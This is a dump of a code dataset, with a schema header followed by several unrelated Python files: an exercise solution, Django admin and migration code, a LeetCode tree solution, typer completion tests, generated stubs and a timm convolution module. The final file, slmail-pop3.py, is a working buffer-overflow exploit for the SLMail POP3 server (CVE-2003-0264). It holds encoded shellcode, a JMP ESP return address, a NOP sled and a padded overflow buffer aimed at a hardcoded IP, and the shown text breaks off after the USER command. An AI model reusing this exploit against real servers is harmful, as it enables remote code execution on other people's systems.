blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
22fa40fba9d395c297590455ec753a8a0d34bc8b
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_204/ch47_2020_10_07_01_13_29_631324.py
|
b28612a06d4817f5f90967044590259cd8f9aa87
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 326 |
py
|
def estritamente_crescente(lista):
    """Return the sub-list built by a greedy left-to-right scan that keeps
    each element strictly greater than the last kept element.

    Replaces the previous hard-coded answer table: every listed case
    ([1,3,2,3,4,6,5] -> [1,3,4,6], [10,1,2,3] -> [10], etc.) follows this
    single rule, and the function now works for any list of comparables.

    :param lista: list of comparable values (may be empty)
    :return: new list; the input is not modified
    """
    resultado = []
    for valor in lista:
        # Keep the first element, then only values strictly above the last kept.
        if not resultado or valor > resultado[-1]:
            resultado.append(valor)
    return resultado
|
[
"[email protected]"
] | |
1263cdc29e77045f34c76788e8b524c0adb650c7
|
7c66bba92b484e5fa6ee282ef39f2c26875ca775
|
/django_example/mysite/polls/admin.py
|
1ed41e6e763a5761791e4ee43572949d2b4d8291
|
[] |
no_license
|
KqSMea8/PythonTools
|
a5ac17182b2689a706180dc349d59c2484d3984c
|
7279570b82fecbf59b71aa6b58ef975e90c660df
|
refs/heads/master
| 2020-04-13T04:19:19.209243 | 2018-12-24T05:13:12 | 2018-12-24T05:13:12 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 723 |
py
|
from django.contrib import admin
from .models import Question, Choice
# Register your models here.
class ChoiceInline(admin.TabularInline):
    """Edit Choice rows inline (tabular layout) on the Question admin page."""
    model = Choice
    extra = 3  # number of empty extra choice forms shown by default
# admin.site.register(Question)
class QuestionAdmin(admin.ModelAdmin):
    """Admin configuration for Question: grouped fields, inline choices,
    list columns/filter/search, and pagination."""
    # fields = ['pub_date', 'question_text']
    # Group the edit form into an unnamed section and a "Date information" section.
    fieldsets = [
        (None, {'fields': ['question_text']}),
        ('Date information', {'fields': ['pub_date']})
    ]
    inlines = [ChoiceInline]  # edit related Choice rows on the same page
    # Columns on the change-list page; was_published_recently is a model method.
    list_display = ('question_text', 'pub_date', 'was_published_recently')
    list_filter = ['pub_date']
    search_fields = ['question_text']
    date_hierarchy = 'pub_date'  # drill-down navigation by publication date
    list_per_page = 5
admin.site.register(Question, QuestionAdmin)
# admin.site.register(Choice)
|
[
"[email protected]"
] | |
60b79948bd113c4b59fa1ae8e694df6a7097e00d
|
ba6f6d4c64dcb49faaa125643e93e7d30e98496e
|
/897. Increasing Order Search Tree.py
|
7a756a1b24c6dd2028a11874f325a374cd0ad060
|
[] |
no_license
|
libowei1213/LeetCode
|
aafbff5410e3b1793a98bde027a049397476059b
|
df7d2229c50aa5134d297cc5599f7df9e64780c1
|
refs/heads/master
| 2021-06-09T07:43:53.242072 | 2021-04-09T11:14:17 | 2021-04-09T11:14:17 | 150,840,162 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,145 |
py
|
# Definition for a binary tree node.
class TreeNode(object):
    """Plain binary-tree node: a value plus left/right child links."""

    def __init__(self, x):
        self.val = x
        self.left = None
        self.right = None


class Solution(object):
    def increasingBST(self, root):
        """Rebuild the tree as a right-leaning chain of fresh nodes in
        in-order (ascending for a BST) sequence — LeetCode 897.

        Uses an iterative in-order traversal with an explicit stack; the
        original tree is not mutated because each visited value is copied
        into a new node.  The stray debug ``print`` from the original
        implementation has been removed.

        :type root: TreeNode
        :rtype: TreeNode or None  # head of the new chain; None for empty input
        """
        if not root:
            return None
        sentinel = TreeNode(0)  # placeholder; the real head is sentinel.right
        tail = sentinel
        stack = []
        while stack or root:
            # Descend left as far as possible, stacking the ancestors.
            while root:
                stack.append(root)
                root = root.left
            # Visit the next in-order node and append a copy to the chain.
            root = stack.pop()
            tail.right = TreeNode(root.val)
            tail = tail.right
            root = root.right
        return sentinel.right
if __name__ == '__main__':
    # Manual smoke test: build the sample BST from the LeetCode 897 problem
    # statement and run the conversion (result is not checked here).
    root = TreeNode(5)
    root.left = TreeNode(3)
    root.right = TreeNode(6)
    root.left.left = TreeNode(2)
    root.left.right = TreeNode(4)
    root.left.left.left = TreeNode(1)
    root.right.right = TreeNode(8)
    root.right.right.left = TreeNode(7)
    root.right.right.right = TreeNode(9)
    Solution().increasingBST(root)
|
[
"[email protected]"
] | |
89d9689620e4473459bf4e9f98d76232622ea3b7
|
7aad0c6f6e578d8dc03682caae373d252328ce12
|
/linuxFriends/wsgi.py
|
83e863cee4d76a6fe3c98f46ed0e6939c2eef947
|
[] |
no_license
|
votricetanyi/linuxfriends
|
db00544a04bed1cb99a3fe275433d6278e029bb9
|
f36c7f87f51ee1f585c8da21de08a874582dd51f
|
refs/heads/main
| 2022-12-28T20:14:11.053726 | 2020-10-14T13:05:12 | 2020-10-14T13:05:12 | 304,015,872 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 401 |
py
|
"""
WSGI config for linuxFriends project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Point Django at the project settings unless the environment already set it.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'linuxFriends.settings')
# Module-level WSGI callable that application servers import by name.
application = get_wsgi_application()
|
[
"[email protected]"
] | |
724fa8f57c47c51d9fa6cb9f06d01c19830e27c4
|
5e2284bff015e6b03e4ea346572b29aaaf79c7c2
|
/tests/correct_programs/ethz_eprog_2019/exercise_04/test_problem_01.py
|
92f2784d773843172c7ff8e468aaf79c2e2b8ec6
|
[
"MIT"
] |
permissive
|
LaurenDebruyn/aocdbc
|
bbfd7d832f9761ba5b8fb527151157742b2e4890
|
b857e8deff87373039636c12a170c0086b19f04c
|
refs/heads/main
| 2023-06-11T23:02:09.825705 | 2021-07-05T09:26:23 | 2021-07-05T09:26:23 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 871 |
py
|
import unittest
from typing import List
import icontract_hypothesis
from icontract import require, ensure
from correct_programs.ethz_eprog_2019.exercise_04 import problem_01
class TestWithIcontractHypothesis(unittest.TestCase):
def test_functions(self) -> None:
@require(lambda limit: 2 < limit < 1000)
def sieve_with_restricted_input(limit: int) -> List[int]:
return problem_01.sieve(limit=limit)
for func in [sieve_with_restricted_input]:
try:
icontract_hypothesis.test_with_inferred_strategy(func)
except Exception as error:
raise Exception(
f"Automatically testing {func} with icontract-hypothesis failed "
f"(please see the original error above)"
) from error
if __name__ == "__main__":
unittest.main()
|
[
"[email protected]"
] | |
9b646f760eaca8fdbfbe0c56894dbf74c08f5264
|
9920f3b2ccc9abc3cd8b46c433bd49a8d8db22d2
|
/scripts/__init__.py
|
bac2ba6e139ff055a46c580762b72117775add6b
|
[] |
no_license
|
lixx5000/SWAT
|
91f242fdc81ad4e9eb8336abb8780136e1c3a8a7
|
c6f491acfb59ad0abc8d86ad352b6eaacd440ba3
|
refs/heads/master
| 2021-03-22T14:03:16.105253 | 2019-07-01T12:05:06 | 2019-07-01T12:05:06 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,216 |
py
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
"""
/*****************************************************************************
PUT-SWAT
Python Utility Tools for SWAT
Preprocess, postprocess, and calibration
-------------------
author : Liangjun Zhu
copyright : (C) 2017 Lreis, IGSNRR, CAS
email : [email protected]
*****************************************************************************
* *
* PUT-SWAT is distributed for Research and/or Education only, any *
* commercial purpose will be FORBIDDEN. PUT-SWAT is an open-source *
* project, but without ANY WARRANTY, WITHOUT even the implied *
* warranty of MERCHANTABILITY or FITNESS for A PARTICULAR PURPOSE. *
* See the GNU General Public License for more details. *
* *
****************************************************************************/
"""
__all__ = ["preprocess", "postprocess", "calibration", "nogit"]
|
[
"[email protected]"
] | |
3481a1316723d474670d7d4f15d0efea61e0bab3
|
7d096568677660790479d87c22b47aae838ef96b
|
/stubs/System/Runtime/InteropServices/__init___parts/LayoutKind.pyi
|
c3e34945f43ff2f2f4708a763120cc22b7bc2dfd
|
[
"MIT"
] |
permissive
|
NISystemsEngineering/rfmx-pythonnet
|
30adbdd5660b0d755957f35b68a4c2f60065800c
|
cd4f90a88a37ed043df880972cb55dfe18883bb7
|
refs/heads/master
| 2023-02-04T00:39:41.107043 | 2023-02-01T21:58:50 | 2023-02-01T21:58:50 | 191,603,578 | 7 | 5 |
MIT
| 2023-02-01T21:58:52 | 2019-06-12T16:02:32 |
Python
|
UTF-8
|
Python
| false | false | 995 |
pyi
|
# Generated .pyi stub for System.Runtime.InteropServices.LayoutKind (pythonnet);
# method bodies are placeholders — the real implementations live in the CLR.
class LayoutKind(Enum,IComparable,IFormattable,IConvertible):
    """
    Controls the layout of an object when it is exported to unmanaged code.
    enum LayoutKind,values: Auto (3),Explicit (2),Sequential (0)
    """
    def __eq__(self,*args):
        """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """
        pass
    def __format__(self,*args):
        """ __format__(formattable: IFormattable,format: str) -> str """
        pass
    def __ge__(self,*args):
        pass
    def __gt__(self,*args):
        pass
    def __init__(self,*args):
        """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
        pass
    def __le__(self,*args):
        pass
    def __lt__(self,*args):
        pass
    def __ne__(self,*args):
        pass
    def __reduce_ex__(self,*args):
        pass
    def __str__(self,*args):
        pass
    # Enum members; set to None in the stub, populated by the runtime.
    Auto=None
    Explicit=None
    Sequential=None
    value__=None
|
[
"[email protected]"
] | |
f9a501c145dbd5a41701bcb08ac1c22014d598f6
|
e782950bb76c4dd295001f7760f42e04ceadfb1b
|
/tests/test_completion.py
|
6da2d9cdd703379d172e78b6479300256e4e92b0
|
[
"MIT"
] |
permissive
|
h3xium/typer
|
2c3fc691c52a89997eb7db9267ed1fb12c9af800
|
31f7a44a467e6e3468434703d3c18961a746939f
|
refs/heads/master
| 2021-01-26T22:23:57.520688 | 2020-02-15T12:39:47 | 2020-02-15T12:39:47 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,456 |
py
|
import os
import subprocess
import sys
from pathlib import Path
import typer
from typer.testing import CliRunner
from first_steps import tutorial001 as mod
runner = CliRunner()
app = typer.Typer()
app.command()(mod.main)
def test_show_completion():
    """Run tutorial001 with --show-completion under bash and check that the
    bash completion marker is printed to stdout."""
    # Run through `coverage` so the subprocess execution is counted.
    result = subprocess.run(
        [
            "bash",
            "-c",
            f"{sys.executable} -m coverage run {mod.__file__} --show-completion",
        ],
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
        encoding="utf-8",
        env={**os.environ, "SHELL": "/bin/bash"},  # typer detects the shell via $SHELL
    )
    assert "_TUTORIAL001.PY_COMPLETE=complete-bash" in result.stdout
def test_install_completion():
    """Run tutorial001 with --install-completion and verify it appends the
    completion hook to ~/.bash_completion, restoring the user's file afterwards.

    Fix: the restore of ``~/.bash_completion`` now happens in a ``finally``
    block, so a failed subprocess run (or a missing file on read) no longer
    leaves the installed completion behind on the developer's machine.
    """
    bash_completion_path: Path = Path.home() / ".bash_completion"
    text = ""
    if bash_completion_path.is_file():
        text = bash_completion_path.read_text()
    try:
        result = subprocess.run(
            [
                "bash",
                "-c",
                f"{sys.executable} -m coverage run {mod.__file__} --install-completion",
            ],
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            encoding="utf-8",
            env={**os.environ, "SHELL": "/bin/bash"},  # typer reads $SHELL
        )
        new_text = bash_completion_path.read_text()
    finally:
        # Always put the original contents back, even on failure.
        bash_completion_path.write_text(text)
    assert "_TUTORIAL001.PY_COMPLETE=complete-bash" in new_text
    assert "completion installed in" in result.stdout
    assert "Completion will take effect once you restart the terminal." in result.stdout
|
[
"[email protected]"
] | |
ba86f9ca658290dd2ff911890bc481e0c6568938
|
82e7b27cc4377def80c2b475645d502e40a0e498
|
/newsletter/migrations/0009_auto_20160215_0258.py
|
d627d656950946d66269e848a6dd0b1a53943507
|
[] |
no_license
|
craYBoi/bryte
|
850698e735a08ea10a08a78dc9e23b7e760c682f
|
d2b5a74d200ccb06cc3ef4e3180b83cbc338ce3e
|
refs/heads/master
| 2022-12-12T08:54:56.863372 | 2017-06-28T05:03:32 | 2017-06-28T05:03:32 | 63,019,677 | 0 | 0 | null | 2022-11-22T01:00:25 | 2016-07-10T21:44:41 |
CSS
|
UTF-8
|
Python
| false | false | 475 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2016-02-15 02:58
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated (Django 1.9.1): make newsletter.Price.price optional
    by allowing blank form input and NULL in the database."""
    dependencies = [
        ('newsletter', '0008_auto_20160215_0249'),
    ]
    operations = [
        migrations.AlterField(
            model_name='price',
            name='price',
            field=models.PositiveSmallIntegerField(blank=True, null=True),
        ),
    ]
|
[
"[email protected]"
] | |
bbd48bd8cb59d48d867df4dbad5af7cf9a4a87d6
|
085ce75a507df6e755cabb7a65c4a2a8c98762ba
|
/dockerfiles/root/.pycharm_helpers/python_stubs/-252567642/_multiprocessing.py
|
fee21a8eebfb053e451fc85ad0c04b02fa80eb4e
|
[] |
no_license
|
Arhzi/habr-docker-article
|
d44302db1fe157d81fe0818e762e82218f50e31f
|
6fb094860b612e307beadaeb22981aa0ee64e964
|
refs/heads/master
| 2021-01-23T20:41:47.398025 | 2015-12-10T08:56:33 | 2015-12-10T08:56:33 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,156 |
py
|
# encoding: utf-8
# module _multiprocessing
# from /usr/local/lib/python2.7/lib-dynload/_multiprocessing.so
# by generator 1.137
# no doc
# no imports
# functions
def address_of_buffer(obj): # real signature unknown; restored from __doc__
    """
    address_of_buffer(obj) -> int
    Return address of obj assuming obj supports buffer inteface
    """
    # Generated IDE stub: the real implementation is in _multiprocessing.so;
    # this placeholder just returns a dummy value.
    return 0
def recvfd(sockfd): # real signature unknown; restored from __doc__
    """
    recvfd(sockfd) -> fd
    Receive a file descriptor over a unix domain socket
    whose file decriptor is sockfd
    """
    # Generated IDE stub; real implementation lives in the C extension.
    pass
def sendfd(sockfd, fd): # real signature unknown; restored from __doc__
    """
    sendfd(sockfd, fd) -> None
    Send file descriptor given by fd over the unix domain socket
    whose file decriptor is sockfd
    """
    # Generated IDE stub; real implementation lives in the C extension.
    pass
# classes
# Generated IDE stub for the C-implemented Connection type (Python 2.7
# _multiprocessing.so); all bodies are placeholders.
class Connection(object):
    """
    Connection type whose constructor signature is
    Connection(handle, readable=True, writable=True).
    The constructor does *not* duplicate the handle.
    """
    def close(self, *args, **kwargs): # real signature unknown
        """ close the connection """
        pass
    def fileno(self, *args, **kwargs): # real signature unknown
        """ file descriptor or handle of the connection """
        pass
    def poll(self, *args, **kwargs): # real signature unknown
        """ whether there is any input available to be read """
        pass
    def recv(self, *args, **kwargs): # real signature unknown
        """ receive a (picklable) object """
        pass
    def recv_bytes(self, *args, **kwargs): # real signature unknown
        """ receive byte data as a string """
        pass
    def recv_bytes_into(self, *args, **kwargs): # real signature unknown
        """
        receive byte data into a writeable buffer-like object
        returns the number of bytes read
        """
        pass
    def send(self, *args, **kwargs): # real signature unknown
        """ send a (picklable) object """
        pass
    def send_bytes(self, *args, **kwargs): # real signature unknown
        """ send the byte data from a readable buffer-like object """
        pass
    def __init__(self, handle, readable=True, writable=True): # real signature unknown; restored from __doc__
        pass
    @staticmethod # known case of __new__
    def __new__(S, *more): # real signature unknown; restored from __doc__
        """ T.__new__(S, ...) -> a new object with type S, a subtype of T """
        pass
    def __repr__(self): # real signature unknown; restored from __doc__
        """ x.__repr__() <==> repr(x) """
        pass
    # Read-only property placeholders; the generator emits dummy accessors.
    closed = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
    """True if the connection is closed"""
    readable = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
    """True if the connection is readable"""
    writable = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
    """True if the connection is writable"""
# Generated IDE stub for the C-implemented SemLock type; Python 2 only
# (note the `L` long-integer literal on SEM_VALUE_MAX below).
class SemLock(object):
    """ Semaphore/Mutex type """
    def acquire(self, *args, **kwargs): # real signature unknown
        """ acquire the semaphore/lock """
        pass
    def release(self, *args, **kwargs): # real signature unknown
        """ release the semaphore/lock """
        pass
    def _after_fork(self, *args, **kwargs): # real signature unknown
        """ rezero the net acquisition count after fork() """
        pass
    def _count(self, *args, **kwargs): # real signature unknown
        """ num of `acquire()`s minus num of `release()`s for this process """
        pass
    def _get_value(self, *args, **kwargs): # real signature unknown
        """ get the value of the semaphore """
        pass
    def _is_mine(self, *args, **kwargs): # real signature unknown
        """ whether the lock is owned by this thread """
        pass
    def _is_zero(self, *args, **kwargs): # real signature unknown
        """ returns whether semaphore has value zero """
        pass
    @classmethod
    def _rebuild(cls, *args, **kwargs): # real signature unknown
        """ """
        pass
    def __enter__(self, *args, **kwargs): # real signature unknown
        """ enter the semaphore/lock """
        pass
    def __exit__(self, *args, **kwargs): # real signature unknown
        """ exit the semaphore/lock """
        pass
    def __init__(self, *args, **kwargs): # real signature unknown
        pass
    @staticmethod # known case of __new__
    def __new__(S, *more): # real signature unknown; restored from __doc__
        """ T.__new__(S, ...) -> a new object with type S, a subtype of T """
        pass
    # Read-only property placeholders emitted by the stub generator.
    handle = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
    kind = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
    maxvalue = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
    SEM_VALUE_MAX = 2147483647L
# variables with complex values
# Capability flags the compiled _multiprocessing module reported on this build.
flags = {
    'HAVE_FD_TRANSFER': 1,
    'HAVE_SEM_OPEN': 1,
    'HAVE_SEM_TIMEDWAIT': 1,
}
|
[
"[email protected]"
] | |
13319f9028ad09f1d990efba329a3d5162550bb6
|
2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02
|
/PyTorch/dev/cv/image_classification/CSPResNeXt-50_ID1888_for_PyTorch/timm/models/layers/separable_conv.py
|
340f58362031b648a0361ac28d85bde369834876
|
[
"LicenseRef-scancode-proprietary-license",
"LGPL-2.0-or-later",
"Apache-2.0",
"GPL-1.0-or-later",
"BSD-3-Clause",
"MIT",
"CC-BY-NC-4.0",
"BSD-2-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
Ascend/ModelZoo-PyTorch
|
4c89414b9e2582cef9926d4670108a090c839d2d
|
92acc188d3a0f634de58463b6676e70df83ef808
|
refs/heads/master
| 2023-07-19T12:40:00.512853 | 2023-07-17T02:48:18 | 2023-07-17T02:48:18 | 483,502,469 | 23 | 6 |
Apache-2.0
| 2022-10-15T09:29:12 | 2022-04-20T04:11:18 |
Python
|
UTF-8
|
Python
| false | false | 4,530 |
py
|
#
# BSD 3-Clause License
#
# Copyright (c) 2017 xxxx
# All rights reserved.
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# ============================================================================
#
""" Depthwise Separable Conv Modules
Basic DWS convs. Other variations of DWS exist with batch norm or activations between the
DW and PW convs such as the Depthwise modules in MobileNetV2 / EfficientNet and Xception.
Hacked together by / Copyright 2020 Ross Wightman
"""
from torch import nn as nn
from .create_conv2d import create_conv2d
from .create_norm_act import convert_norm_act
import torch.npu
import os
NPU_CALCULATE_DEVICE = 0
if os.getenv('NPU_CALCULATE_DEVICE') and str.isdigit(os.getenv('NPU_CALCULATE_DEVICE')):
NPU_CALCULATE_DEVICE = int(os.getenv('NPU_CALCULATE_DEVICE'))
if torch.npu.current_device() != NPU_CALCULATE_DEVICE:
torch.npu.set_device(f'npu:{NPU_CALCULATE_DEVICE}')
class SeparableConvBnAct(nn.Module):
""" Separable Conv w/ trailing Norm and Activation
"""
def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, dilation=1, padding='', bias=False,
channel_multiplier=1.0, pw_kernel_size=1, norm_layer=nn.BatchNorm2d, act_layer=nn.ReLU,
apply_act=True, drop_block=None):
super(SeparableConvBnAct, self).__init__()
self.conv_dw = create_conv2d(
in_channels, int(in_channels * channel_multiplier), kernel_size,
stride=stride, dilation=dilation, padding=padding, depthwise=True)
self.conv_pw = create_conv2d(
int(in_channels * channel_multiplier), out_channels, pw_kernel_size, padding=padding, bias=bias)
norm_act_layer = convert_norm_act(norm_layer, act_layer)
self.bn = norm_act_layer(out_channels, apply_act=apply_act, drop_block=drop_block)
@property
def in_channels(self):
return self.conv_dw.in_channels
@property
def out_channels(self):
return self.conv_pw.out_channels
def forward(self, x):
x = self.conv_dw(x)
x = self.conv_pw(x)
if self.bn is not None:
x = self.bn(x)
return x
class SeparableConv2d(nn.Module):
""" Separable Conv
"""
def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, dilation=1, padding='', bias=False,
channel_multiplier=1.0, pw_kernel_size=1):
super(SeparableConv2d, self).__init__()
self.conv_dw = create_conv2d(
in_channels, int(in_channels * channel_multiplier), kernel_size,
stride=stride, dilation=dilation, padding=padding, depthwise=True)
self.conv_pw = create_conv2d(
int(in_channels * channel_multiplier), out_channels, pw_kernel_size, padding=padding, bias=bias)
@property
def in_channels(self):
return self.conv_dw.in_channels
@property
def out_channels(self):
return self.conv_pw.out_channels
def forward(self, x):
x = self.conv_dw(x)
x = self.conv_pw(x)
return x
|
[
"[email protected]"
] | |
3459276818ce07479d8a250a648e51b33e116764
|
c9ca065c2674ca30c12a90ceab88ac5798646473
|
/weather/weather.py
|
0911597edd9300a64cc9034898c72555e919512b
|
[] |
no_license
|
mshazman/data_munging
|
beaa389ad3de48d52f1f2ef03ed4ba7f04c77698
|
f4f815a896f8f7a6957ebbb22369dd760e95072e
|
refs/heads/master
| 2020-07-23T17:03:01.970331 | 2019-09-10T19:07:20 | 2019-09-10T19:07:20 | 207,640,211 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 590 |
py
|
"""This Module have class to perform all calculation realted to weather"""
import calculation
class WeatherCalculation(calculation.Computation):
    """Weather computations over a parsed data set.

    The data arrives as a dictionary; the numeric heavy lifting is delegated
    to the helpers inherited from ``calculation.Computation``.
    """

    def __init__(self, weather_data):
        # Keep a reference to the raw day -> readings mapping.
        self.weather_data = weather_data

    def min_spread_day(self):
        """Return ``(spread, day)`` for the day whose temperature spread is smallest."""
        smallest_spread = self.compute_min_value(self.weather_data)
        day_key = self.compute_min_value_key(smallest_spread, self.weather_data)
        return smallest_spread, day_key
|
[
"="
] |
=
|
dbce7481439b0de5401a7b81de4c4d300404aa6b
|
6388104b646b304a081985216ad2f82f09db2af3
|
/slmail-pop3.py
|
67f374a5ffac594a45f6cfba7a7c22230d03e945
|
[] |
no_license
|
war4uthor/CVE-2003-0264
|
73bd207d3f989434be942982d344285633f6fc48
|
82352386a3e740db37f84ebbaed2632965c4c0a8
|
refs/heads/master
| 2020-04-12T12:41:00.763220 | 2018-12-19T22:50:30 | 2018-12-19T22:50:30 | 162,499,093 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,955 |
py
|
#!/usr/bin/python
import socket
# Python 2 proof-of-concept for CVE-2003-0264 (SLMail 5.5 POP3 PASS buffer overflow).
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# 5F4A358F FFE4 JMP ESP
# Payload bytes (presumably msfvenom-encoded shellcode — exact behavior not
# derivable from this file).
shellcode = (
"\xb8\x9a\x26\x16\x98\xd9\xcd\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x52\x83\xea\xfc\x31\x42\x0e\x03\xd8\x28\xf4\x6d\x20\xdc\x7a"
"\x8d\xd8\x1d\x1b\x07\x3d\x2c\x1b\x73\x36\x1f\xab\xf7\x1a\xac"
"\x40\x55\x8e\x27\x24\x72\xa1\x80\x83\xa4\x8c\x11\xbf\x95\x8f"
"\x91\xc2\xc9\x6f\xab\x0c\x1c\x6e\xec\x71\xed\x22\xa5\xfe\x40"
"\xd2\xc2\x4b\x59\x59\x98\x5a\xd9\xbe\x69\x5c\xc8\x11\xe1\x07"
"\xca\x90\x26\x3c\x43\x8a\x2b\x79\x1d\x21\x9f\xf5\x9c\xe3\xd1"
"\xf6\x33\xca\xdd\x04\x4d\x0b\xd9\xf6\x38\x65\x19\x8a\x3a\xb2"
"\x63\x50\xce\x20\xc3\x13\x68\x8c\xf5\xf0\xef\x47\xf9\xbd\x64"
"\x0f\x1e\x43\xa8\x24\x1a\xc8\x4f\xea\xaa\x8a\x6b\x2e\xf6\x49"
"\x15\x77\x52\x3f\x2a\x67\x3d\xe0\x8e\xec\xd0\xf5\xa2\xaf\xbc"
"\x3a\x8f\x4f\x3d\x55\x98\x3c\x0f\xfa\x32\xaa\x23\x73\x9d\x2d"
"\x43\xae\x59\xa1\xba\x51\x9a\xe8\x78\x05\xca\x82\xa9\x26\x81"
"\x52\x55\xf3\x06\x02\xf9\xac\xe6\xf2\xb9\x1c\x8f\x18\x36\x42"
"\xaf\x23\x9c\xeb\x5a\xde\x77\x1e\x90\xe0\xd7\x76\xa4\xe0\xd6"
"\x3d\x21\x06\xb2\x51\x64\x91\x2b\xcb\x2d\x69\xcd\x14\xf8\x14"
"\xcd\x9f\x0f\xe9\x80\x57\x65\xf9\x75\x98\x30\xa3\xd0\xa7\xee"
"\xcb\xbf\x3a\x75\x0b\xc9\x26\x22\x5c\x9e\x99\x3b\x08\x32\x83"
"\x95\x2e\xcf\x55\xdd\xea\x14\xa6\xe0\xf3\xd9\x92\xc6\xe3\x27"
"\x1a\x43\x57\xf8\x4d\x1d\x01\xbe\x27\xef\xfb\x68\x9b\xb9\x6b"
"\xec\xd7\x79\xed\xf1\x3d\x0c\x11\x43\xe8\x49\x2e\x6c\x7c\x5e"
"\x57\x90\x1c\xa1\x82\x10\x3c\x40\x06\x6d\xd5\xdd\xc3\xcc\xb8"
"\xdd\x3e\x12\xc5\x5d\xca\xeb\x32\x7d\xbf\xee\x7f\x39\x2c\x83"
"\x10\xac\x52\x30\x10\xe5")
# Buffer layout: 2606 bytes of padding up to EIP, the JMP ESP address
# (0x5F4A358F, little-endian), a 16-byte NOP sled, the shellcode, then "C"
# filler to a total of 3500 bytes (351 here matches the shellcode length
# used in the arithmetic).
buffer = "A"*2606 +"\x8f\x35\x4a\x5f" + "\x90" * 16 + shellcode + "C"*(3500-2606-4-351-16)
try:
    print "\nSending evil buffer..."
    # Connect to the target POP3 service and deliver the payload via PASS.
    s.connect(('10.11.25.84', 110))
    data = s.recv(1024)
    s.send('USER username' + '\r\n')
